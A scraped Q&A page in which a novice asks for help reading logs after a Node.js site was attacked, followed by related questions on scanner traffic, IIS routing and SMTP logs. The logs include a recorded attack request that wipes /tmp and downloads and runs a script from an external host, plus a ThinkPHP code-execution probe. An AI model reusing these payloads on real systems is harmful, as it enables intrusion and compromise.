My node js website was attacked. How do I analyze what hapened? - node.js

I am new to web programming and I coded a Node js website. I know C very well but not JS.
I recently changed the port forward to port 80 and it didn't take long before I was attacked. I saved the logs and undid the forwarding of port 80. Could anyone help me analyze what happened from the logs I got and help me know what has to be done in order to repair the damage?
Basically, what was happening was my website constantly redirected me to a sketchy p*rn website...
Should I reinstall windows?
How can I prevent this from happening again?
Here are the logs:
GET / 302 3.645 ms - 28
POST /HNAP1/ 404 1.731 ms - 146
GET /shell?cd+/tmp;rm+-rf+*;wget+jx.qingdaosheng.com/jaws;sh+/tmp/jaws - - ms - -
GET / 302 3.529 ms - 28
GET /login 200 4.956 ms - 899
GET / 302 3.630 ms - 28
POST /Autodiscover/Autodiscover.xml 404 1.961 ms - 169
HEAD / 302 3.398 ms - 28
HEAD /login 200 5.009 ms - 899
GET /admin/assets/plugins/elfinder/php/connector.php 404 4.192 ms - 186
GET / 302 3.543 ms - 28
GET / 302 2.859 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.777 ms - 28
GET / 302 6.587 ms - 28
GET / 302 2.774 ms - 28
GET / 302 2.781 ms - 28
GET / 302 2.770 ms - 28
GET / 302 2.978 ms - 28
GET / 302 2.645 ms - 28
GET / 302 2.802 ms - 28
GET / 302 2.725 ms - 28
GET / 302 2.794 ms - 28
GET / 302 1.433 ms - 28
GET / 302 2.773 ms - 28
GET / 302 2.718 ms - 28
GET / 302 2.785 ms - 28
GET / 302 2.742 ms - 28
GET / 302 6.103 ms - 28
GET / 302 2.771 ms - 28
GET / 302 2.745 ms - 28
GET / 302 0.895 ms - 28
GET / 302 2.786 ms - 28
GET / 302 2.787 ms - 28
GET / 302 2.877 ms - 28
GET / 302 2.757 ms - 28
GET / 302 5.917 ms - 28
GET / 302 2.831 ms - 28
GET / 302 2.800 ms - 28
GET / 302 2.792 ms - 28
GET / 302 4.423 ms - 28
GET / 302 2.816 ms - 28
GET / 302 2.695 ms - 28
GET / 302 2.738 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.745 ms - 28
GET / 302 2.765 ms - 28
GET / 302 2.698 ms - 28
GET / 302 2.854 ms - 28
GET / 302 2.839 ms - 28
GET / 302 6.197 ms - 28
GET / 302 2.983 ms - 28
GET / 302 2.794 ms - 28
GET / 302 2.722 ms - 28
GET / 302 2.780 ms - 28
GET / 302 2.776 ms - 28
GET / 302 2.775 ms - 28
GET / 302 2.742 ms - 28
GET / 302 2.772 ms - 28
GET / 302 2.668 ms - 28
GET / 302 2.723 ms - 28
GET / 302 2.717 ms - 28
GET / 302 5.661 ms - 28
GET / 302 2.771 ms - 28
GET / 302 2.700 ms - 28
GET / 302 6.351 ms - 28
GET / 302 2.801 ms - 28
GET / 302 2.734 ms - 28
GET / 302 6.229 ms - 28
GET / 302 1.745 ms - 28
GET / 302 2.727 ms - 28
GET / 302 2.777 ms - 28
GET / 302 2.734 ms - 28
GET / 302 1.434 ms - 28
GET / 302 2.739 ms - 28
GET / 302 2.711 ms - 28
GET / 302 5.326 ms - 28
GET / 302 2.664 ms - 28
GET / 302 2.677 ms - 28
GET / 302 0.891 ms - 28
GET / 302 2.783 ms - 28
GET / 302 2.745 ms - 28
GET / 302 2.738 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.740 ms - 28
GET / 302 2.720 ms - 28
GET / 302 2.769 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.749 ms - 28
GET / 302 5.041 ms - 28
GET / 302 2.789 ms - 28
GET / 302 2.725 ms - 28
GET / 302 2.657 ms - 28
GET / 302 2.712 ms - 28
GET / 302 2.709 ms - 28
GET / 302 2.681 ms - 28
GET / 302 2.708 ms - 28
GET / 302 2.678 ms - 28
GET / 302 2.686 ms - 28
GET / 302 6.256 ms - 28
GET / 302 1.400 ms - 28
GET / 302 2.749 ms - 28
GET / 302 2.741 ms - 28
GET / 302 2.779 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.742 ms - 28
GET / 302 2.774 ms - 28
GET / 302 5.494 ms - 28
GET / 302 2.724 ms - 28
GET / 302 2.723 ms - 28
GET / 302 2.737 ms - 28
GET / 302 2.715 ms - 28
GET / 302 2.667 ms - 28
GET / 302 2.721 ms - 28
GET / 302 2.721 ms - 28
GET / 302 2.781 ms - 28
GET / 302 2.734 ms - 28
GET / 302 2.708 ms - 28
GET / 302 2.747 ms - 28
GET / 302 2.769 ms - 28
GET / 302 2.768 ms - 28
GET / 302 2.776 ms - 28
GET / 302 5.605 ms - 28
GET / 302 2.741 ms - 28
GET / 302 2.837 ms - 28
GET / 302 2.724 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.740 ms - 28
GET / 302 5.212 ms - 28
GET / 302 2.696 ms - 28
GET / 302 2.732 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.700 ms - 28
POST /boaform/admin/formLogin 404 3.031 ms - 163
GET / 302 3.579 ms - 28
POST /boaform/admin/formLogin 404 2.609 ms - 163
HEAD / 302 7.173 ms - 28
GET / 302 3.531 ms - 28
GET / 302 3.738 ms - 28
GET /login 200 6.611 ms - 899
GET /?XDEBUG_SESSION_START=phpstorm 302 3.465 ms - 28
GET /login 200 4.785 ms - 899
GET / 302 6.692 ms - 28
GET /login 200 4.763 ms - 899
GET / 302 3.788 ms - 28
GET /login 200 5.032 ms - 899
GET / 302 3.390 ms - 28
GET / 302 6.433 ms - 28
GET / 302 3.553 ms - 28
GET /login 200 4.816 ms - 899
GET / 302 3.593 ms - 28
GET /login 200 3.175 ms - 899
GET / 302 3.621 ms - 28
GET / 302 3.566 ms - 28
GET / 302 3.481 ms - 28
GET / 302 3.204 ms - 28
GET /login 200 4.710 ms - 899
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404
3.642 ms - 148
GET / 302 3.487 ms - 28
GET /login 200 4.985 ms - 899
GET / 302 3.500 ms - 28
GET /login 200 8.021 ms - 899
GET / 302 3.668 ms - 28

Related

how to block random calls from outside

running nodemon with express on my api domain
i keep getting random calls apparently from outside
kinda ruins my work flow... :)
[nodemon] 1.19.1
[nodemon] to restart at any time, enter `rs`
[nodemon] watching: *.*
[nodemon] starting `node server.js`
3000 ok
mongo ok
GET /article.asp 404 3.246 ms - 150
GET /cintact.htm 404 0.380 ms - 150
GET /mainpage.html 404 0.197 ms - 152
GET /wan.asp 404 0.238 ms - 146
GET /aben.htm 404 0.220 ms - 147
GET /diispostmaster.asp 404 0.191 ms - 157
GET /molu.asp 404 0.192 ms - 147
GET /xz.asp 404 0.215 ms - 145
GET /server.asp 404 0.166 ms - 149
GET /admin_softdl.asp 404 0.251 ms - 155
GET /mda.htm 404 0.246 ms - 146
GET /_.htm 404 0.207 ms - 144
GET /gh.txt 404 0.221 ms - 145
GET /windowx.txt 404 0.214 ms - 150
GET /jc.html 404 0.208 ms - 146
GET /tongyi.html 404 0.189 ms - 150
GET /abb.asp 404 0.236 ms - 146
GET /zijing.html 404 0.207 ms - 150
GET /dsf.jsp 404 0.188 ms - 146
GET /zongg/daima.asp?id=65 404 0.857 ms - 154
GET /200861912234469.asp 404 0.254 ms - 158
GET /loveyun.asp 404 0.175 ms - 150
GET /z.htm 404 0.201 ms - 144
GET /xxoo.txt 404 0.182 ms - 147
GET /dd.txt 404 0.155 ms - 145
GET /anti-microsoft.html 404 0.204 ms - 158
GET /ckfinder/userfiles/files/robots.txt 404 0.188 ms - 174
GET /test.txt 404 0.205 ms - 147
GET /hacked.asp 404 0.220 ms - 149
GET /text.txt 404 0.190 ms - 147
GET /gha.asp 404 0.204 ms - 146
GET /hnboy.asp 404 0.224 ms - 148
GET /the.htm 404 1.513 ms - 146
GET /sear.asp 404 0.182 ms - 147
GET /010.txt 404 0.192 ms - 146
GET /aa.asp 404 0.225 ms - 145
GET /2009091519484277962.htm 404 0.209 ms - 162
GET /jyhack.com.txt 404 0.223 ms - 153
GET /3.asa 404 0.265 ms - 144
GET /ccs.txt 404 0.206 ms - 146
GET /sc201052034222.asp 404 0.234 ms - 157
GET /xt.asp 404 0.198 ms - 145
GET /error.asp 404 0.217 ms - 148
GET /hacker.aspx 404 0.241 ms - 150
GET /ab.php 404 0.187 ms - 145
GET /images/log.php 404 0.205 ms - 153
GET /homepage.htm 404 0.230 ms - 151
GET /xt.html 404 0.180 ms - 146
GET /junior.asp 404 0.205 ms - 149
GET /net.asp 404 0.183 ms - 146
GET /db.txt 404 0.213 ms - 145
.....list goes on and on................................
should i add extra security or just bloc the massages?
thanks for any advice : )

ASP core navigation between applications on same domain

I have one domain and 3 web applications (and I'll have much more).
I would like to create the main application which will contain some list with links and description about these applications.
I have the main application in IIS and then others like sub-applications. I would like to navigate between them like mydomain.com/app1/then/something and mydomain.com/app2/index...
When I create pure HTML (using <a href="">) everything is working, but when I create a web application - there is problem.
In Firefox I get only white screen when I try to access sub-application
(e.g. mydomain.com/app1) and in Chrome HTTP 500.
I am using Razor pages.
I expect that this is a problem with routing so I'll have to change some routing conditions or map the other apps.
Could you give me a hint, please? I tried to search for some solutions, but I couldn't find one (I was probably searching bad sentence).
Thank you for every advice.
Edit: Added logs
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2018-09-25 07:33:35
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2018-09-25 07:33:35 10.208.132.246 GET / - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 200 0 0 1771
2018-09-25 07:33:35 10.208.132.246 GET /css/site.css - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 9
2018-09-25 07:33:35 10.208.132.246 GET /lib/bootstrap/dist/css/bootstrap.css - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 10
2018-09-25 07:33:35 10.208.132.246 GET /css/site.min.css v=kHvJwvVAK1eJLN4w8xygUR3nbvlLmRwi5yr-OuAO90E 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 9
2018-09-25 07:33:35 10.208.132.246 GET /js/site.min.js v=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 200 0 0 5
2018-09-25 07:33:35 10.208.132.246 GET /lib/jquery/dist/jquery.js - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 2
2018-09-25 07:33:35 10.208.132.246 GET /js/site.js v=dLGP40S79Xnx6GqUthRF6NWvjvhQ1nOvdVSwaNcgG18 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 4
2018-09-25 07:33:35 10.208.132.246 GET /lib/bootstrap/dist/js/bootstrap.js - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 4
2018-09-25 07:33:35 10.208.132.246 GET /favicon.ico - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 200 0 0 50
2018-09-25 07:33:43 10.208.132.246 GET /App1/ - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 500 19 183 43
2018-09-25 07:33:46 10.208.132.246 GET /App1 - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 500 19 183 42
2018-09-25 07:33:54 10.208.132.246 GET /App2 - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 500 19 183 44
2018-09-25 07:34:03 10.208.132.246 GET /App2/App2SpecificPage/Parameter - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 500 19 183 42
Many thaks to poke
My problem was combination of missing app.UsePathBase("/app1") in application Startup.cs file and bad settings in IIS.
But main problem was that I didn't added application to the middleware.

website hosted in aws ec2 not loading

I have a website hosted in aws ec2 (windows instance) which stopped loading since few days onwards no clue whatsoever, below the output of traceroute please help
Tracing route to 126news.com [18.221.68.117]
over a maximum of 30 hops:
1 3 ms 3 ms 1 ms WirelessAP [192.168.1.1]
2 6 ms 20 ms 3 ms 10.111.192.1
3 3 ms 3 ms 3 ms 10.229.0.13
4 3 ms 3 ms 4 ms broadband.actcorp.in [183.82.14.221]
5 3 ms 3 ms 6 ms 14.141.24.169.static-hyderabad.tcl.net.in [14.141.24.169]
6 * * * Request timed out.
7 33 ms 28 ms 29 ms ix-ae-4-2.tcore1.cxr-chennai.as6453.net [180.87.36.9]
8 65 ms 64 ms 68 ms if-ae-13-2.tcore1.svw-singapore.as6453.net [180.87.36.83]
9 100 ms 67 ms 70 ms if-ae-11-2.thar1.svq-singapore.as6453.net [180.87.98.37]
10 64 ms 66 ms 64 ms ae-6.r00.sngpsi05.sg.bb.gin.ntt.net [129.250.8.241]
11 64 ms 72 ms 64 ms ae-10.r20.sngpsi05.sg.bb.gin.ntt.net [129.250.7.18]
12 247 ms 240 ms 240 ms ae-8.r22.snjsca04.us.bb.gin.ntt.net [129.250.3.48]
13 243 ms 245 ms 249 ms ae-8.r21.chcgil09.us.bb.gin.ntt.net [129.250.5.16]
14 244 ms 244 ms 245 ms ae-2.r07.chcgil09.us.bb.gin.ntt.net [129.250.4.214]
15 249 ms 248 ms 249 ms ae-1.a01.chcgil09.us.bb.gin.ntt.net [129.250.5.94]
16 246 ms 252 ms 361 ms ae-2.amazon.chcgil09.us.bb.gin.ntt.net [129.250.201.106]
17 262 ms 284 ms 255 ms 52.95.62.122
18 261 ms 261 ms 262 ms 52.95.62.125
19 * * * Request timed out.
20 260 ms 263 ms 259 ms 54.239.46.161
21 256 ms 272 ms 258 ms 54.239.43.225
22 * * * Request timed out.
23 * * * Request timed out.
24 260 ms 258 ms 261 ms 52.95.1.234
25 255 ms 258 ms 255 ms 52.95.1.247
26 262 ms 259 ms 256 ms 52.95.1.106
27 259 ms 259 ms 260 ms 52.95.1.87
28 253 ms 253 ms 252 ms 52.95.3.142
29 * * * Request timed out.
30 * * * Request timed out.
Trace complete.

bot framework returning unauthorized after server reboot

I have my bot. it's online. on a local machine the bot is working fine, but on the server it is returning unauthorized error. These are the iis logs
2016-12-30 23:06:44 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.78.21.180 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 93
2016-12-30 23:06:44 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.46 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 374
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.88.101 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.46 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 374
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.64 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 375
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.64 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 374
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.92.251 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.46 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 390
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.91.106 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.78.17.157 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 78
we didn't do anything to the bot; however, suddenly it stopped working after the reboot. I gave full permission to the folder that's containing the bot, but still not working.

Can somebody explain these TIMEOUT entries in my IIS SMTP log?

For some mails I'm trying to send over our SMTP server I get entries in the log like shown below.
Can somebody explain WHAT is timing out here and what IIS is trying to do?
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 DATA - - 0 0 4 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 354+End+data+with+<CR><LF>.<CR><LF> 0 0 35 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.0.0+Ok:+queued+as+F35C24A057 0 0 34 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 QUIT - - 0 0 4 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 221+2.0.0+Bye 0 0 13 0 31 SMTP - - - -
2011-11-27 13:58:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 67831 637670 SMTP - - - -
2011-11-27 13:58:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 638122 193 67831 637670 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 EHLO - +BXWEB00.netfra.local 250 0 186 25 0 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 MAIL - +FROM:<Email-Service#serverdomain.com> 250 0 62 49 0 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 RCPT - +TO:<recipient1#anotherdomain.de> 250 0 35 32 0 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 DATA - +<CHILKAT-MID-937818f1-c530-c3c7-e380-cc106ff13646#BXWEB00.netfra.local> 250 0 155 67995 0 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 220+ffm2mta20.hpuss.de+ESMTP 0 0 28 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 EHLO - BXWEB00.netfra.local 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250-ffm2mta20.hpuss.de 0 0 22 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 MAIL - FROM:<Email-Service#serverdomain.com>+SIZE=68278 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.1.0+Ok 0 0 12 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 RCPT - TO:<recipient1#anotherdomain.de> 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.1.5+Ok 0 0 12 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 DATA - - 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 354+End+data+with+<CR><LF>.<CR><LF> 0 0 35 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.0.0+Ok:+queued+as+DB9C54A057 0 0 34 0 31 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 QUIT - - 0 0 4 0 31 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 221+2.0.0+Bye 0 0 13 0 31 SMTP - - - -
2011-11-27 14:02:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 8813 637093 SMTP - - - -
2011-11-27 14:02:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 637280 193 8813 637093 SMTP - - - -
2011-11-27 14:05:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 68489 636140 SMTP - - - -
2011-11-27 14:05:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 636608 193 68489 636140 SMTP - - - -
2011-11-27 14:06:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 8501 605751 SMTP - - - -
2011-11-27 14:06:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 605939 193 8501 605751 SMTP - - - -
2011-11-27 14:07:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 8813 605377 SMTP - - - -
2011-11-27 14:07:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 605565 193 8813 605377 SMTP - - - -
2011-11-27 14:08:58 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 EHLO - +BXWEB00.netfra.local 250 0 186 25 0 SMTP - - - -
The timeouts were caused by not actively closing the connection from the client to the SMTP server. The component used was Chilkat (http://www.chilkatsoft.com/refdoc/csMailManRef.html) and the manual states:
The mailman object automatically opens an SMTP connection (if necessary) whenever an email-sending method is called. The connection is kept open until explicitly closed by this method. Calling this method is entirely optional. The SMTP connection is also automatically closed when the mailman object is destructed. Thus, if an application calls SendEmail 10 times to send 10 emails, the 1st call will open the SMTP connection, while the subsequent 9 will send over the existing connection (unless a property such as username, login, hostname, etc. is changed, which would force the connection to become closed and re-established with the next mail-sending method call).
Note: This method sends a QUIT command to the SMTP server prior to closing the connection.
However, this seems to be a problem for some SMTP server. They want the connection to be closed after each mail.
You didn't post the lines before that TIMEOUT line. If I had to guess, the previous line was a RCPT TO line, when the DATA line was expected.
This smells like an antivirus issue. For a test, try disabling any antivirus software you have, and see if the entries go away.
--Dave

Resources